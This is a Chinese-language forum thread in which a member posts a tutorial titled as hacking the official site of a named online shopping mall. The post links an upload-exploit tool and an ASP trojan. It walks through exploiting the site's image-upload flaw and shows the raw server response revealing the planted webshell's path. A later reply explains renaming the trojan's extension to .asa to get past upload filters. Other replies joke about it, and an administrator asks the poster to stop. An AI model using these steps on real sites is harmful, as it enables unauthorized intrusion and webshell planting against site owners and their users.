[时尚生活] 入侵秋叶商城官方站

[复制链接] 12
查看

荣誉会员

QQ

马上注册,结交更多郧西好友

您需要 登录 才可以下载或查看,没有帐号?注册

x
今天教大家的是入侵秋叶商城官方站txt
准备工具
1动感商城文件上传upfile  下载地址 http://wwwkf169com/Soft/gongju/200504/536html

2海阳ASP木马 下载地址 http://wwwkf169com/Soft/kongzhi/200412/9html

外地的朋友可以用搜索引擎寻找,网上很多!

下面我们开始教程!
首先打开百度 输入易动网络

然后进入秋页商城

首先注册一个用户名,然后选择发布二手信息

然后选择上传图片 我们抓个包看一下,可以看到呢他这个上传的页面和动感商城的是一样的,只不过呢他把upfileflashasp改成upfileflash1asp

然后我们用动感上传的工具上传,返回信息HTTP/11 100 Continue
Server: Microsoft-IIS/50
Date: Wed, 20 Apr 2005 08:30:33 GMT
X-Powered-By: ASPNET

HTTP/11 500 Internal Server Error
Server: Microsoft-IIS/50
Date: Wed, 20 Apr 2005 08:30:34 GMT
X-Powered-By: ASPNET
Content-Length: 557
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSQBATQA=GPKAFKPBEFCEPADPEMIPKMIK; path=/
Cache-control: private

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<link href="images/csscss" rel="stylesheet" type="text/css">
<font face="宋体" size=2>
<p>rovider</font> <font face="宋体" size=2 > 错误 &#39;80070057&#39;</font>
<p>
<font face="宋体" size=2>参数错误。</font>
<p>
<font face="宋体" size=2>/uploadwjinc</font><font face="宋体" size=2>,行66</font> <script>windowopenerdocumentmyformbookpicvalue=&#39;bookpic/kf169asp
<script language="javascript">
windowalert("文件上传成功!请不要修改生成的链接地址!");
windowclose();
</script>

这里面呢bookpic/kf169asp这个就是我们小马的地址了~!

好了我们的C/S马也传上了~!然后就用我们做好的木马工具提交一下~!

论坛创始人

游不走的鱼

管理员

QQ
这么麻烦啊!

荣誉会员

QQ
这都很简单了呀
因为不能上传动画所以你看这些是有一些麻烦
不过有动画的话你一看就知道是怎么回事了

中级会员

呵呵,在此我说你是个坏孩子
可是有谁不是坏孩子呢
哈哈 [audio01]  [audio03]  [audio02]

荣誉会员

QQ
倒~~~~
这些都是用网页上传漏洞,先上传一个小马,把木马的扩展名改成asa的这样在网页里面也默认是asp所以一样可以用,但是很多的管理员都忘了把这们给去掉
然后大家就可以用海洋或是老兵的大马了这看个人爱好

中级会员

小心被别人举报了哦,呵呵

荣誉会员

QQ
没关系的哪,我只是喜欢拿管理员的权限进去看看,但我从不修改别人的主页

论坛创始人

游不走的鱼

管理员

QQ
你不要再教别人了
会教坏的哦!

荣誉会员

QQ
那好吧下次我不在发这样的东西了

中级会员

别啊,发啊,我谁让你不发拉啊?

荣誉会员

QQ
如果大家喜欢网络安全可以加我的QQ群我会不断上传一些非常好用的工具教大家怎么使用这些
但千万不要搞破坏

中级会员

好啊你加我QQ啊谢谢了
[audio05]

荣誉会员

QQ
我是说加我的QQ群
因为我用了四年的QQ里面加的人目前才100多个我不喜欢加网友我的都是认识的
麻烦加群就可以了到时我给你上传一些共享工具

发表回复